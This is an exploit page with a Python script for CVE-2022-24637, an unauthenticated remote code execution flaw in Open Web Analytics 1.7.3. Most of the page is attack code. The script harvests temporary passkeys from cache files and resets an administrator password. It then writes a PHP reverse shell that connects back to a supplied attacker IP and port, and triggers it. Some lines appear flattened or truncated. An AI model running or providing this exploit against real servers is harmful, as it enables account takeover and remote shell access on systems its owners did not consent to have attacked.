Open Web Analytics 1.7.3 Remote Code Execution

Credit: Jacob Ebben
Risk: High
Local: No
Remote: Yes

# Exploit Title: Open Web Analytics 1.7.3 - Remote Code Execution (RCE) # Date: 2022-08-30 # Exploit Author: Jacob Ebben # Vendor Homepage: # Software Link: # Version: <1.7.4 # Tested on: Linux # CVE : CVE-2022-24637 import argparse import requests import base64 import re import random import string import hashlib from termcolor import colored def print_message(message, type): if type == 'SUCCESS': print('[' + colored('SUCCESS', 'green') + '] ' + message) elif type == 'INFO': print('[' + colored('INFO', 'blue') + '] ' + message) elif type == 'WARNING': print('[' + colored('WARNING', 'yellow') + '] ' + message) elif type == 'ALERT': print('[' + colored('ALERT', 'yellow') + '] ' + message) elif type == 'ERROR': print('[' + colored('ERROR', 'red') + '] ' + message) def get_normalized_url(url): if url[-1] != '/': url += '/' if url[0:7].lower() != 'http://' and url[0:8].lower() != 'https://': url = "http://" + url return url def get_proxy_protocol(url): if url[0:8].lower() == 'https://': return 'https' return 'http' def get_random_string(length): chars = string.ascii_letters + string.digits return ''.join(random.choice(chars) for i in range(length)) def get_cache_content(cache_raw): regex_cache_base64 = r'\*(\w*)\*' regex_result =, cache_raw) if not regex_result: print_message('The provided URL does not appear to be vulnerable ...', "ERROR") exit() else: cache_base64 = return base64.b64decode(cache_base64).decode("ascii") def get_cache_username(cache): regex_cache_username = r'"user_id";O:12:"owa_dbColumn":11:{s:4:"name";N;s:5:"value";s:5:"(\w*)"' return, cache).group(1) def get_cache_temppass(cache): regex_cache_temppass = r'"temp_passkey";O:12:"owa_dbColumn":11:{s:4:"name";N;s:5:"value";s:32:"(\w*)"' return, cache).group(1) def get_update_nonce(url): try: update_nonce_request = session.get(url, proxies=proxies) regex_update_nonce = r'owa_nonce" value="(\w*)"' update_nonce =, update_nonce_request.text).group(1) except Exception as e: print_message('An error occurred when attempting to update config!', "ERROR") print(e) exit() else: return update_nonce parser = argparse.ArgumentParser(description='Exploit for CVE-2022-24637: Unauthenticated RCE in Open Web Analytics (OWA)') parser.add_argument('TARGET', type=str, help='Target URL (Example: http://localhost/owa/ or') parser.add_argument('ATTACKER_IP', type=str, help='Address for reverse shell listener on attacking machine') parser.add_argument('ATTACKER_PORT', type=str, help='Port for reverse shell listener on attacking machine') parser.add_argument('-u', '--username', default="admin", type=str, help='The username to exploit (Default: admin)') parser.add_argument('-p','--password', default=get_random_string(32), type=str, help='The new password for the exploited user') parser.add_argument('-P','--proxy', type=str, help='HTTP proxy address (Example:') parser.add_argument('-c', '--check', action='store_true', help='Check vulnerability without exploitation') args = parser.parse_args() base_url = get_normalized_url(args.TARGET) login_url = base_url + "index.php?owa_do=base.loginForm" password_reset_url = base_url + "index.php?owa_do=base.usersPasswordEntry" update_config_url = base_url + "index.php?owa_do=base.optionsGeneral" username = args.username new_password = args.password reverse_shell = '<?php $sock=fsockopen("' + args.ATTACKER_IP + '",'+ args.ATTACKER_PORT + ');$proc=proc_open("sh", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);?>' shell_filename = get_random_string(8) + '.php' shell_url = base_url + 'owa-data/caches/' + shell_filename if args.proxy: proxy_url = get_normalized_url(args.proxy) proxy_protocol = get_proxy_protocol(proxy_url) proxies = { proxy_protocol: proxy_url } else: proxies = {} session = requests.Session() try: mainpage_request = session.get(base_url, proxies=proxies) except Exception as e: print_message('Could not connect to "' + base_url, "ERROR") exit() else: print_message('Connected to "' + base_url + '" successfully!', "SUCCESS") if 'Open Web Analytics' not in mainpage_request.text: print_message('Could not confirm whether this website is hosting OWA! Continuing exploitation...', "WARNING") elif 'version=1.7.3' not in mainpage_request.text: print_message('Could not confirm whether this OWA instance is vulnerable! Continuing exploitation...', "WARNING") else: print_message('The webserver indicates a vulnerable version!', "ALERT") try: data = { "owa_user_id": username, "owa_password": username, "owa_action": "base.login" }, data=data, proxies=proxies) except Exception as e: print_message('An error occurred during the login attempt!', "ERROR") print(e) exit() else: print_message('Attempting to generate cache for "' + username + '" user', "INFO") print_message('Attempting to find cache of "' + username + '" user', "INFO") found = False for key in range(100): user_id = 'user_id' + str(key) userid_hash = hashlib.md5(user_id.encode()).hexdigest() filename = userid_hash + '.php' cache_url = base_url + "owa-data/caches/" + str(key) + "/owa_user/" + filename cache_request = requests.get(cache_url, proxies=proxies) if cache_request.status_code != 200: continue; cache_raw = cache_request.text cache = get_cache_content(cache_raw) cache_username = get_cache_username(cache) if cache_username != username: print_message('The temporary password for a different user was found. "' + cache_username + '": ' + get_cache_temppass(cache), "INFO") continue; else: found = True break if not found: print_message('No cache found. Are you sure "' + username + '" is a valid user?', "ERROR") exit() cache_temppass = get_cache_temppass(cache) print_message('Found temporary password for user "' + username + '": ' + cache_temppass, "INFO") if args.check: print_message('The system appears to be vulnerable!', "ALERT") exit() try: data = { "owa_password": new_password, "owa_password2": new_password, "owa_k": cache_temppass, "owa_action": "base.usersChangePassword" }, data=data, proxies=proxies) except Exception as e: print_message('An error occurred when changing the user password!', "ERROR") print(e) exit() else: print_message('Changed the password of "' + username + '" to "' + new_password + '"', "INFO") try: data = { "owa_user_id": username, "owa_password": new_password, "owa_action": "base.login" }, data=data, proxies=proxies) except Exception as e: print_message('An error occurred during the login attempt!', "ERROR") print(e) exit() else: print_message('Logged in as "' + username + '" user', "SUCCESS") nonce = get_update_nonce(update_config_url) try: log_location = "/var/www/html/owa/owa-data/caches/" + shell_filename data = { "owa_nonce": nonce, "owa_action": "base.optionsUpdate", "owa_config[base.error_log_file]": log_location, "owa_config[base.error_log_level]": 2 }, data=data, proxies=proxies) except Exception as e: print_message('An error occurred when attempting to update config!', "ERROR") print(e) exit() else: print_message('Creating log file', "INFO") nonce = get_update_nonce(update_config_url) try: data = { "owa_nonce": nonce, "owa_action": "base.optionsUpdate", "owa_config[shell]": reverse_shell }, data=data, proxies=proxies) except Exception as e: print_message('An error occurred when attempting to update config!', "ERROR") print(e) exit() else: print_message('Wrote payload to log file', "INFO") try: session.get(shell_url, proxies=proxies) except Exception as e: print(e) else: print_message('Triggering payload! Check your listener!', "SUCCESS") print_message('You can trigger the payload again at "' + shell_url + '"' , "INFO")

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